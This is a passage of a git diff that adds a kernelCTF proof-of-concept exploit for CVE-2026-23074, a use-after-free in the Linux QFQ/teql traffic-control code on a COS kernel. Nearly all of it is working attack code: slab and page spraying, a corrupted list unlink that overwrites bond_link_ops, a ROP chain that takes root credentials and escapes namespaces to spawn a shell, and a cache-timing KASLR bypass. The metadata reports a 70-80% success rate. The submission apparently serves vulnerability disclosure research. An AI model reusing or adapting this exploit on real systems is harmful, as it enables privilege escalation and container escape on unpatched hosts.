add teql qdisc +static void add_qdisc_teql(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL,ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "teql0"); + nl_send(sock, msg); +} + +// add netem qdisc +static void add_qdisc_netem(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL, + ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "netem"); + + struct tc_netem_qopt qopt; + memset(&qopt, 0, sizeof(qopt)); + qopt.latency = 100000000; // set latency to 6.4s to control qfq_dequeue() re-entry timing + qopt.limit = 1000; // max packets in queue + nl_attr_put(msg, TC_MSG_BUFSIZE, TCA_OPTIONS, &qopt, sizeof(qopt)); + + nl_send(sock, msg); +} + + +// create dummy interface +static int create_dummy_interface(int sock, const char *name) +{ + struct nl_req req; + memset(&req, 0, sizeof(req)); + + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL; + req.ifi.ifi_family = AF_UNSPEC; + + struct rtattr *rta = (struct rtattr *)((char *)&req + NLMSG_ALIGN(req.nlh.nlmsg_len)); + rta->rta_type = IFLA_IFNAME; + rta->rta_len = RTA_LENGTH(strlen(name) + 1); + strcpy((char*)RTA_DATA(rta), name); + req.nlh.nlmsg_len += RTA_ALIGN(rta->rta_len); + + struct rtattr *linkinfo = (struct rtattr *)((char *)&req + NLMSG_ALIGN(req.nlh.nlmsg_len)); + linkinfo->rta_type = IFLA_LINKINFO; + + struct rtattr *kind = (struct rtattr*)RTA_DATA(linkinfo); + kind->rta_type = IFLA_INFO_KIND; + kind->rta_len = RTA_LENGTH(6); + strcpy((char*)RTA_DATA(kind), "dummy"); + + linkinfo->rta_len = RTA_LENGTH(RTA_ALIGN(kind->rta_len)); + req.nlh.nlmsg_len += RTA_ALIGN(linkinfo->rta_len); + + return send(sock, &req, req.nlh.nlmsg_len, 0); +} + +// interface up +static int set_interface_up(int sock, int ifindex) +{ + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifi; + } req; + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST; + req.ifi.ifi_family = AF_UNSPEC; + req.ifi.ifi_index = ifindex; + req.ifi.ifi_flags = IFF_UP; + req.ifi.ifi_change = IFF_UP; + + return send(sock, &req, req.nlh.nlmsg_len, 0); +} + +// create dummy0 interface and set root qdisc for qfq_aggregate struct spray +static void setup_spray_interface(int sock) +{ + create_dummy_interface(sock, "dummy0"); + usleep(10000); + + spray_ifindex = if_nametoindex("dummy0"); + set_interface_up(sock, spray_ifindex); + add_qdisc_qfq(sock, spray_ifindex, TC_H_ROOT, SPRAY_QDISC); +} + +// spray qfq_aggregate in kmalloc-128 +// use different lmax per set to assign each to a different qfq_group +static void spray_qfq_aggregate_kmalloc_128(int sock, int set) +{ + uint32_t base = 0x10 + (set * 0x100); + + for (int i = 0; i < SPRAY_CLASS_COUNT; i++) { + add_class_qfq(sock, spray_ifindex, SPRAY_QDISC, TC_HANDLE(100, base + i), 1, 1514 + set * 0x100 + i); + } +} + +// delete QFQ class +static int del_qfq_class(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_DELTCLASS, NLM_F_REQUEST, ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + return nl_send(sock, msg); +} + +static void free_spray_classes(int sock, int set) +{ + uint32_t base = 0x10 + (set * 0x100); + + for (int i = 0; i < SPRAY_CLASS_COUNT; i++) { + del_qfq_class(sock, spray_ifindex, SPRAY_QDISC, TC_HANDLE(100, base + i)); + } +} + +// add SFQ qdisc (qopt values are arbitrary, just need to pass validation) +static void add_qdisc_sfq(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL,ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "sfq"); + + struct tc_sfq_qopt_v1 qopt; + memset(&qopt, 0, sizeof(qopt)); + qopt.v0.quantum = 150994944; + qopt.v0.perturb_period = 50331648; + qopt.v0.limit = 4278190080; + qopt.v0.divisor = 4152360959; + qopt.v0.flows = 150994957; + qopt.depth = 33554432; + qopt.qth_min = 33554432; + qopt.qth_max = 83886080; + nl_attr_put(msg, TC_MSG_BUFSIZE, TCA_OPTIONS, &qopt, sizeof(qopt)); + nl_send(sock, msg); +} + +// update QFQ class parameters +static void update_class_qfq(int sock, int ifindex, uint32_t parent, uint32_t handle, + uint32_t weight, uint32_t lmax) +{ + struct rtattr* nest; + struct nlmsghdr* msg = nl_msg_init(); + + nl_msg_init_tc(msg, RTM_NEWTCLASS, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_REPLACE, ifindex, parent, handle); + + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + + nest = nl_attr_nest_start(msg, TC_MSG_BUFSIZE, TCA_OPTIONS); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_WEIGHT, weight); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_LMAX, lmax); + nl_attr_nest_end(msg, nest); + + nl_send(sock, msg); +} + + +int pgv_create_socket(size_t block_size, size_t block_nr) { + int socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); + if (socketfd < 0) { + perror("socket"); + return -1; + } + + int version = TPACKET_V1; + if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) { + perror("setsockopt PACKET_VERSION"); + close(socketfd); + return -1; + } + + struct tpacket_req req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_block_nr = block_nr; + req.tp_frame_size = PAGE_SIZE; + req.tp_frame_nr = (block_size * block_nr) / PAGE_SIZE; + + if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) { + perror("setsockopt PACKET_TX_RING"); + close(socketfd); + return -1; + } + + return socketfd; +} + +void pgvAdd(int idx, int order, int nr) { + size_t block_size = PAGE_SIZE * (1 << order); + pgv[idx].fd = pgv_create_socket(block_size, nr); + pgv[idx].size = block_size * nr; +} + +void *pgvMap(int idx) { + pgv[idx].mapped = (char*)mmap(NULL, pgv[idx].size, PROT_READ | PROT_WRITE, MAP_SHARED, pgv[idx].fd, 0); + if (pgv[idx].mapped == MAP_FAILED) { + perror("mmap"); + return NULL; + } + return pgv[idx].mapped; +} + +void pgvDel(int idx) { + if (pgv[idx].mapped && pgv[idx].mapped != MAP_FAILED) { + munmap(pgv[idx].mapped, pgv[idx].size); + pgv[idx].mapped = NULL; + } + if (pgv[idx].fd > 0) { + close(pgv[idx].fd); + pgv[idx].fd = 0; + } + pgv[idx].size = 0; +} + +// initialize libxdk target DB +// manually register symbols not in kxdb via AddSymbol +void init_libxdk(void) { + static TargetDb kxdb("target_db.kxdb", target_db); + + Target st("kernelctf", "cos-113-18244.521.39"); + + st.AddSymbol("__init_begin", 0x345c000); + st.AddSymbol("bond_link_ops", 0x2d86f00); + st.AddSymbol("gadget_xor_eax_ret", GADGET_XOR_EAX_JMP); + st.AddSymbol("swapgs_restore_regs_and_return_to_usermode", 0x1401190); + + + st.AddStruct("qfq_aggregate", 104, { + {"next.next", 0x00, 8}, + {"next.pprev", 0x08, 8}, + {"grp", 0x20, 8}, + {"inv_w", 0x30, 4}, + {"budgetmax", 0x34, 4}, + {"initial_budget", 0x38, 4}, + {"budget", 0x3c, 4}, + {"active.next", 0x48, 8}, + }); + + + kxdb.AddTarget(st); + + static Target target = kxdb.AutoDetectTarget(); + g_target = ⌖ + + printf("[+] Target: %s %s\n", target.GetDistro().c_str(), target.GetReleaseName().c_str()); +} + +// spray fake data over freed qfq_aggregate location via pgv +void spray_pgv(void) { + // lookup field offsets + auto off_next_next = g_target->GetFieldOffset("qfq_aggregate", "next.next"); + auto off_next_pprev = g_target->GetFieldOffset("qfq_aggregate", "next.pprev"); + auto off_grp = g_target->GetFieldOffset("qfq_aggregate", "grp"); + auto off_inv_w = g_target->GetFieldOffset("qfq_aggregate", "inv_w"); + auto off_budgetmax = g_target->GetFieldOffset("qfq_aggregate", "budgetmax"); + auto off_initial_budget = g_target->GetFieldOffset("qfq_aggregate", "initial_budget"); + auto off_budget = g_target->GetFieldOffset("qfq_aggregate", "budget"); + auto off_active_next = g_target->GetFieldOffset("qfq_aggregate", "active.next"); + + pgvAdd(0, 0, 0x200); + char *res = (char*)pgvMap(0); + if (!res) return; + + size_t total_size = pgv[0].size; + + for (size_t offset = 0; offset < total_size; offset += 0x80) { + char *agg = res + offset; + // craft next/pprev so hlist_del_init() writes ROP chain address to bond_link_ops + *(uint64_t*)(agg + off_next_next) = init_region_base + FAKE_ROP_CHAIN_OFFS; // ROP chain location + *(uint64_t*)(agg + off_next_pprev) = bond_link_ops; // unlink writes ROP chain location to bond_link_ops + *(uint64_t*)(agg + off_grp) = init_region_base + FAKE_DUMMY_PTR_OFFS; // valid pointer needed due to grp->slot_shift access + *(uint32_t*)(agg + off_inv_w) = 0x1000; + *(uint32_t*)(agg + off_budgetmax) = 0xffffffff; + *(uint32_t*)(agg + off_initial_budget) = 0x1000; + *(uint32_t*)(agg + off_budget) = 0x2000; + *(uint64_t*)(agg + off_active_next) = init_region_base + FAKE_CL_ALIST_OFFS; // points to cl + } +} + +// NPerm spray. [__init_begin, __init_end] region is freed after boot and can be reclaimed via user mmap +void spray_nperm_payload(){ + size_t cl = init_region_base + FAKE_CL_STRUCT_OFFS; + size_t qdisc = init_region_base + FAKE_QDISC_STRUCT_OFFS; + + pgvAdd(1, 9, 0x610); // bulk allocation to drain free pages, so subsequent mmap reclaims [__init_begin, __init_end] region + + RopChain rop(*g_target, kaslr); + + // rtnl_link_ops->kind pointer and stack_pivot sit in the middle of ROP chain, skip with stack shift gadgets + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(init_region_base + FAKE_KIND_STRING_INDEX * sizeof(size_t)); // rtnl_link_ops->kind points to ((size_t*)addr)[FAKE_KIND_STRING_INDEX] + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(stack_pivot); // stack_pivot gadget + + // privilege escalation + namespace escape + rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS); + rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1}); + + // Return to userspace + rop.Add(swapgs_restore_regs_and_return_to_usermode + 54); + rop.Add(0); + rop.Add(0); + rop.Add((uint64_t)get_shell); + rop.Add(user_cs); + rop.Add(user_rflags); + rop.Add(user_rsp & 0xffffffffffffff00); + rop.Add(user_ss); + + std::vector rop_data = rop.GetData(); + // mmap 0x10000 (65536) pages to attempt reclaiming [__init_begin, __init_end] region + for(int i = 0; i < 0x1000 * 0x10; i++){ + void *addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if(addr == MAP_FAILED) break; + // no suitable pivot for ops->peek() call in qfq_peek_skb(), use xor eax, eax to return NULL and bypass + ((size_t*)addr)[FAKE_CL_PTR] = cl; + ((size_t*)addr)[FAKE_QDISC_PTR] = qdisc; + ((size_t*)addr)[FAKE_OPS_PEEK_PTR] = xor_eax_jmp; + ((size_t*)addr)[FAKE_KIND_STRING_INDEX] = FAKE_KIND_STRING_IPVLAN; + // place ROP chain + memcpy(&((size_t*)addr)[0x108], rop_data.data(), rop_data.size()); + } + + pgvDel(1); +} + +/* + * LL_ATK: send RTM_NEWLINK request with "ipvlan" type. + * kernel traverses rtnl_link_ops list, follows corrupted bond_link_ops->list.next + * to fake ops with kind "ipvlan", calls function pointer -> triggers ROP + */ +void LL_ATK() { + struct { + struct nlmsghdr nh; + struct ifinfomsg ifi; + char buf[1024]; + } req; + + struct rtattr *rta; + int sock; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + exit(EXIT_FAILURE); + } + + memset(&req, 0, sizeof(req)); + + req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(req.ifi)); + req.nh.nlmsg_type = RTM_NEWLINK; + req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL; + + req.ifi.ifi_family = AF_UNSPEC; + + rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.nh.nlmsg_len)); + rta->rta_type = IFLA_LINKINFO; + rta->rta_len = RTA_LENGTH(0); + + struct rtattr *rta_data = (struct rtattr *)(((char *)rta) + RTA_ALIGN(rta->rta_len)); + rta_data->rta_type = IFLA_INFO_KIND; + rta_data->rta_len = RTA_LENGTH(strlen("ipvlan") + 1); + strcpy((char *)RTA_DATA(rta_data), "ipvlan"); + + rta->rta_len = RTA_ALIGN(rta->rta_len) + RTA_ALIGN(rta_data->rta_len); + + req.nh.nlmsg_len = NLMSG_ALIGN(req.nh.nlmsg_len) + RTA_ALIGN(rta->rta_len); + + write(sock,&req, req.nh.nlmsg_len); +} + +/* + * setup TC structure + * + * ROOT qdisc 1:0 (QFQ) + * ├── class 1:1 (weight=15, lmax=16384) -> netem + * └── class 1:2 (weight=1, lmax=1514) -> teql + */ +static long vuln_setup(void) +{ + int sock; + int ifindex = 1; + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + + cleanup_tc(sock, ifindex); + setup_spray_interface(sock); + + add_qdisc_qfq(sock, ifindex, TC_H_ROOT, TC_HANDLE(1, 0)); + + add_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 1), 15, 16384); + add_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 2000); + + add_qdisc_sfq(sock, ifindex, TC_HANDLE(1, 1), TC_HANDLE(2, 0)); + send_to_class(TC_HANDLE(1, 2), 1); + // spray qfq_aggregate around the target to land in the same slab as the UAF target + spray_qfq_aggregate_kmalloc_128(sock, 0); + spray_qfq_aggregate_kmalloc_128(sock, 1); + add_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 1514); + update_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 1514); + spray_qfq_aggregate_kmalloc_128(sock, 2); + + add_qdisc_netem(sock, ifindex, TC_HANDLE(1, 1), TC_HANDLE(2, 0)); + add_qdisc_teql(sock, ifindex, TC_HANDLE(1, 2), TC_HANDLE(3, 0)); + + send_to_class(TC_HANDLE(1, 1), 1); + send_to_class(TC_HANDLE(1, 2), 1); + + close(sock); + return 0; +} + +static long vuln_setup2(void) +{ + int sock; + int ifindex = 1; + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + + // free sprayed qfq_aggregate + free_spray_classes(sock, 0); + free_spray_classes(sock, 1); + free_spray_classes(sock, 2); + update_class_qfq(sock, ifindex, TC_HANDLE(1, 0), TC_HANDLE(1, 2), 1, 32222); // hanging lmax frees existing qfq_aggregate, leaving dangling pointer + close(sock); + return 0; +} + +int main(void) +{ + leak_kaslr(); + init_libxdk(); + setup_kernel_address(); + setup_env(); + pid_t pid = fork(); + + if (pid == 0) { + spray_nperm_payload(); + _exit(0); + } + else if (pid > 0) { + int status; + waitpid(pid, &status, 0); + + vuln_setup(); + vuln_setup2(); + spray_pgv(); + // @sleep(kernel_func="qfq_dequeue", desc="wait for netem delay to trigger UAF") + sleep(10); + LL_ATK(); + } + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.o b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.o new file mode 100644 index 000000000..a7bd52e47 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.o differ diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c new file mode 100644 index 000000000..c7430d9d5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.c @@ -0,0 +1,215 @@ +#include +#include +#include "kaslr_bypass.h" + +#define KASLR_BYPASS_INTEL 1 +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) +#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) + +uint64_t kaslr = -1; + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch(void* p) +{ + asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +int bypass_kaslr(uint64_t base) { + if (!base) { + #ifdef KASLR_BYPASS_INTEL + #define OFFSET 0 + #define START (0xffffffff81000000ull + OFFSET) + #define END (0xffffffffD0000000ull + OFFSET) + #define STEP 0x0000000001000000ull + while (1) { + uint64_t bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + logd("majority vote failed:\n"); + logd("base = 0x%lx with %d votes\n", base, c); + } + #else + #define START (0xffffffff81000000ull) + #define END (0xffffffffc0000000ull) + #define STEP 0x0000000000200000ull + #define NUM_TRIALS 7 + // largest contiguous mapped area at the beginning of _stext + #define WINDOW_SIZE 11 + + while (1) { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote ++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + logd("majority vote failed:\n"); + logd("base = 0x%lx with %d votes\n", base, c); + } + #endif + } + +got_base: + logd("Using kernel base 0x%lx", base); + kaslr = base; + + return 0; +} + +void leak_kaslr(void) +{ + bypass_kaslr(0); + printf("[+] kernel base: 0x%lx\n", kaslr); +} diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.h b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.h new file mode 100644 index 000000000..7652ea5ab --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.h @@ -0,0 +1,19 @@ +#ifndef KASLR_BYPASS_H +#define KASLR_BYPASS_H + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +extern uint64_t kaslr; + +int bypass_kaslr(uint64_t base); +void leak_kaslr(void); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.o b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.o new file mode 100644 index 000000000..65248fc43 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/kaslr_bypass.o differ diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23074_cos/metadata.json new file mode 100644 index 000000000..f525ec8ed --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/metadata.json @@ -0,0 +1,25 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp440"], + "vulnerability": { + "cve": "CVE-2026-23074", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50da4b9d07a7a463e2cfb738f3ad4cff6b2c9c3b", + "affected_versions": ["2.6.12-rc2 - 6.19-rc6"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NET_SCHED", + "CONFIG_NET_SCH_TEQL" + ] + } + }, + "exploits":{ + "cos-113-18244.521.39": { + "environment": "cos-113-18244.521.39", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "7 ~ 8 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23074_cos/original.tar.gz new file mode 100755 index 000000000..f8cfd1e14 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23074_cos/original.tar.gz differ